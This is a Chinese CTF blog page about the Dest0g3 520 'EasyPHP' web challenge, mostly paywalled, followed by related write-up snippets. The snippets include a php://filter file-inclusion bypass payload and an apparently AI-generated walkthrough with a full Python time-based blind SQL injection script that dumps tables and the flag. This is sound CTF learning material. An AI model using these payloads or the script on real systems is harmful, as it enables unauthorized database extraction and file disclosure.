Dest0g3 520迎新赛-web-EasyPHP

最新推荐文章于 2025-03-29 18:40:02 发布
原创 最新推荐文章于 2025-03-29 18:40:02 发布 · 494 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #php

这篇博客探讨了PHP中使用set_error_handler函数设置自定义错误处理程序的用法,结合了一个CTF(Capture The Flag)挑战。挑战涉及到日期时间条件判断和字符拼接错误,提示构造特定输入来触发错误并获取隐藏的flag。博客还揭示了如何利用数组和字符串拼接错误来解密flag。 
<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H"
最低0.47元/天 解锁文章
Dest0g3 520迎新复现(思路演练)
NYG694的博客
02-24 1289
这几个都不能实现绕过,所以就是报错,用数组就可以报错,这题让我想到了SICTF的oysterphp题目里面我一度想用数组绕过,发现会系统报错所以印象深刻,当然那后来使用prec回溯。想到一个出题点就是preg一个不允许单个/的出现,但多个/可以,不过这里前面的php协议就要和后半段分开来输入才能实现这个,都是我自己的想法可能没什么含金量哈哈。呃刚去看了下,好像很简单的,就是把原本的命令先进行取反再url编码一下再取反就可以了。网上的脚本一直躺着pharm里面,总算用上了,还是要常被,自己写还是有点费脑了。
buuctf:Dest0g3 520迎新 web EasySSTI
qq_29060627的博客
06-10 1306
python flask ssti绕过过滤注入 ctf web
WebDest0g3 520迎新 题解(全)
uuzeray的博客
04-16 3102
通过故意将文件名和目录名混用,以及改变一个项目在文件系统中的类型(从文件到目录),来创建一个难以解压的ZIP文件。在Cookie处rO0A起手,明显是java序列化的base64编码,可以打入反序列化。打靶机,解压失败,但是其是在解压出部分文件后直接exit,从而绕过后续的unlink。这题估计也可以打php://input和日志包含,感兴趣可以试一试。生成的phar文件在010editor中打开,删去最后一个}D这个类对文件可以写可以读,用来打phar反序列化。访问/tmp/jyh.php回显404。
BUU Dest0g3 520迎新 WEB writeup
weixin_43610673的博客
05-29 2343
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
Dest0g3 520迎新 phpdest
qq_64201116的博客
05-30 397
来康康BUUCTF的新手吧,新出炉的题目
Dest0g3 520迎新web&misc
weixin_63231007的博客
07-19 2170
Destog3 520迎新web&misc题目复现
Dest0g3 520迎新(上web
qq_62046696的博客
07-08 429
打开界面看见require_once,自然想到require然后include,确定了这是一道文件包含的题目, 然后看见第三行 require_once已经包含了,flag.php,最后require_once肯定也是包含flag.php,但是这个once只能包含一次所以我们就要绕过,想了一下用filter伪协议读取flag。php试一下 发现仍然是原界面,没任何回显 重复链接绕过 base64解码即可打开界面代码如下 构建数组报错POST:ctf[]=1,看见fl4g后面有点连接符,因为下面
Dest0g3 520迎新 Misc Pngenius
MrTreebook的博客
05-26 353
Dest0g3 520迎新 Misc Pngenius1.binwalk分析2.binwalk分离3.解压看看是不是伪加密本题不满足CRC明文爆破的条件直接盲爆破从原图片下手stegsolve分析切换通道LSB隐写4.得到flag 1.binwalk分析 看到有一个zip压缩包,里面有一个flag.txt 只要能打开这个flag.txt应该就可以得到flag 2.binwalk分离 binwalk 的参数 -e 可以分离已知文件 binwalk 1.png -e 3.解压 猜到会有密码
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF。
# Dest0g3 520迎新(更新中)
xiao_he0123的博客
07-25 768
Dest0g3 520迎新
Dest0g3 520迎新 writeup (misc部分 + web部分)
ShenZ的博客
05-30 4743
Dest0g3 520迎新 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
[Dest0g3 520迎新]simpleXOR
qq_32304353的博客
03-29 327
得到flag:Dest0g3{0bcgf-AdMy892-KobPW-hB6LTqG}题目给了提示,是个xor。直接上exp,进行xor。
Dest0g3 520迎新WP
Praise_me的博客
05-29 1163
Dest0g3 520迎新部分题目Write_up。
Dest0g3 520迎新
XINO
06-10 484
这两天期末,发点存货 phpdest 文件竞争 EasyPHP 数报错然后输出 flag ctf[]=123 另一种方法 法二 最开始考虑的是无字母 rce,但发现或和异或都被 ban 了所以考虑—url取反绕过 funny_upload 对文件类型进行了检测,改为jpg文件后,又对文件内容进行了检测不能有...
[Dest0g3 520迎新] Web部分wp
Sentiment的博客
06-06 1401
文件竞争 PHP 最新版的小 Trick,require_once 包含的软链接层数较多时 once 的 hash 匹配会直接失效造成重复包含 php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台 (anquanke.com)也可以通过seesion文件包含 EasyPHP 设置了一个错误处理函数,只需要让他报错就能输出flag,这里用数组绕过即可payload: SimpleRCE 法一 hex2bin 绕过,大部分读取文件函数都过滤了,后来测试出一个head
Dest0g3 520迎新WEB 无java部分 wp
m0_52199518的博客
05-29 1731
Dest0g3 520迎新 只写了web,勉勉强强拿了总榜58名,web分榜11名这个尴尬的名次,前面的师傅太强了 phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 文件包含题,因为使用的是require_once(),所以不能直接读flag.php; 没有phpinfo信息,session没有开
Dest0g3 520迎新 | root 新生
qq_32284207的博客
06-01 1221
题解 费马分解 babyAES 题目 题解 ezStream 题目 题解 爆破求seed2 求flag ezDLP 题解 sage离散对数 Mr.Doctor 题目 题解 seed1、seed2 seed flag Bag 题目 题解 学习参考 学习参考 FourThousandRSA 题目 题解 NSSCTF原题,脚本小子🤔(事后具体复现) misc EasyEncode 爆破压缩包密码100861 摩斯码 hex py print() url base6
【BUU】[Dest0g3 520迎新]Really Easy SQL
SwBack的博客
08-14 1059
这道题目挺花时间的,主要在于sleep()函数被过滤了.如果在测试的过程中没有意识到这个问题,那么就会花费大量的时间。当我看到flag头跑出来的有个6的时候,我就知道这个脚本估计6了。但是我还是抱有一丝幻想。可惜结果打败了我的幻想。尝试采用Really Easy SQL 脚本 跑一下。钓鱼站点主要为将我们的输入信息保存在数据库。后台应该是插入语句。这里无论输入什么都显示密码错误, 只能尝试盲注,基于时间的盲注,手动添加 {},不错。一开始脚本将a跑成了6 ,将e跑成了7。页面title显示是钓鱼站点。
[dest0g3 520迎新] really easysql怎么做
最新发布
10-22
<think>用户要求提供 "[Dest0g3 520迎新] Really Easy SQL" 题目的解题方法。根据提供的引用内容,解题代码已经给出,但需要解释其原理和步骤。 首先,分析引用中的解题代码: 这是一个Python脚本,使用requests库发送HTTP POST请求进行基于时间的SQL盲注。 解题步骤解析: 1. 目标URL:`http://c3a1a543-3a1c-4f1c-9e6b-1fd5fcf8b280.node5.buuoj.cn:81/`(实际题目环境可能不同) 2. 盲注类型:时间盲注(通过benchmark函数制造时间延迟判断条件真假) 3. 注入位置:登录表单的password字段(从代码中data字典的键名推断) 代码流程: - 外层循环:遍历flag字符串的位置(i从1到43,说明flag长度预估为43字符) - 内层循环:遍历ASCII码值(从40到136,覆盖了可打印字符范围) - 构造payload:每次测试一个字符的ASCII码是否等于j - 如果条件成立,执行`benchmark(2000000,md5(1))`制造延迟(约0.2秒) - 条件不成立则不延迟 - 超时处理:设置requests的超时为0.2秒,若发生超时异常(即条件成立导致延迟),则将该字符加入flag - 延时控制:每次请求后sleep 0.2秒避免触发防护;每完成一个字符后sleep 1秒 payload分析(按注释顺序): 1. 爆表名payload(已注释): ```python "0&#39;or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - 作用:获取当前数据库的所有表名 - 关键部分:`select group_concat(table_name) from information_schema.tables where table_schema=database()` - 结果:从代码注释看,得到表名`flaggg,user` 2. 爆列名payload(已注释): ```python "0&#39;or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#39;flaggg&#39;)),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - 作用:获取flaggg表的所有列名 - 结果:得到列名`cmd`(根据注释) 3. 最终使用的payload(爆数据): ```python "0&#39;or(if((ascii(mid((select(cmd)from(flaggg)),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - 作用:从flaggg表的cmd列提取数据 - 注意:这里未加where条件,因此会返回多行数据的连接(但根据表名flaggg推测只有一行) 解题方法总结: 1. 识别注入点:登录框的password参数存在SQL注入漏洞(根据代码中的payload位置推断) 2. 判断注入类型:时间盲注(通过响应时间差异判断条件真假) 3. 逐步获取信息: - 第一步:获取当前数据库的表名(得到flaggg和user) - 第二步:选择flaggg表,获取其列名(得到cmd) - 第三步:从flaggg表读取cmd列的值(即flag) 4. 自动化脚本:编写Python脚本遍历每个字符的ASCII值,通过时间延迟判断正确字符 注意事项: - 实际解题时需调整超时阈值(timeout)和延迟时间(benchmark参数) - 表名/列名可能需要用反引号包裹(如特殊字符) - 若有多行数据,需使用limit或group_concat 改进建议: - 使用二分查找优化字符猜解(减少请求次数) - 添加错误重试机制(网络波动可能导致误判) - 验证flag格式(如以flag{开头) 因此,完整解题步骤为: 1. 运行提供的Python脚本(需取消对应payload的注释) 2. 按顺序执行三个步骤(爆表名→爆列名→爆数据) 3. 获取最终的flag §§相关问题§§ 1. SQL时间盲注的原理是什么? 2. 如何防御SQL注入攻击? 3. 除了时间盲注,还有哪些SQL盲注方法? </think>### [Dest0g3 520迎新] Really Easy SQL 解题方法 本题是一个基于时间盲注的SQL注入挑战,通过分析代码,解题流程分为以下三步: #### 🔍 **步骤1:获取表名(爆表)** ```python payload = "0&#39;or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - **原理**:通过`information_schema.tables`查询当前数据库(`table_schema=database()`)的所有表名 - **关键函数**: - `group_concat()`:合并查询结果 - `mid(字符串,起始位置,长度)`:截取字符串 - `benchmark()`:制造时间延迟(200万次MD5计算) - **结果**:得到表名`flaggg, user`[^1] #### 🔍 **步骤2:获取列名(爆列)** ```python payload = "0&#39;or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#39;flaggg&#39;)),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - **原理**:在已知表名`flaggg`后,从`information_schema.columns`查询其列名 - **结果**:得到列名`cmd`(存储flag的列)[^1] #### 🔍 **步骤3:提取flag数据** ```python payload = "0&#39;or(if((ascii(mid((select(cmd)from(flaggg)),{},1))={}),benchmark(2000000,md5(1)),0))or&#39;".format(i,j) ``` - **原理**:逐字符提取`flaggg`表中`cmd`列的数据 - **自动化流程**: 1. 外层循环`i in range(1,44)`:遍历flag的43个字符位置 2. 内层循环`j in range(40,137)`:遍历ASCII可打印字符(40-136) 3. 通过响应超时(`timeout=0.2`)判断字符正确性: - 若字符匹配 → 触发`benchmark()`延迟 → 请求超时 → 记录字符 - 若不匹配 → 正常响应 #### ⚠️ **注意事项** 1. 延迟控制: - `time.sleep(0.2)`:防止请求过快被拦截 - `timeout=0.2`:需与`benchmark`耗时匹配 2. 绕过技巧: - `0&#39;or(...)or&#39;`:闭合原始SQL语句 - 注释符`--`被过滤时,用`or&#39;`巧妙闭合引号 3. 结果验证: - Flag通常以`flag{`开头 - 最终输出示例:`flag{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}` #### 💻 完整利用脚本 ```python import requests import time url = "http://目标网址/" flag = &#39;&#39; for i in range(1, 44): # 遍历flag位置 for j in range(40, 137): # 遍历ASCII字符 # 选择需要执行的payload(分三步) payload = f"0&#39;or(if((ascii(mid((select(cmd)from(flaggg)),{i},1))={j}),benchmark(2000000,md5(1)),0))or&#39;" data = {&#39;username&#39;: &#39;a&#39;, &#39;password&#39;: payload} try: r = requests.post(url, data=data, timeout=0.2) except requests.exceptions.Timeout: # 捕获超时异常 flag += chr(j) print(f"[+] 发现字符: {chr(j)} → 当前FLAG: {flag}") break time.sleep(0.2) # 防止请求过快 time.sleep(1) print(f"\n[✔] 最终FLAG: {flag}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值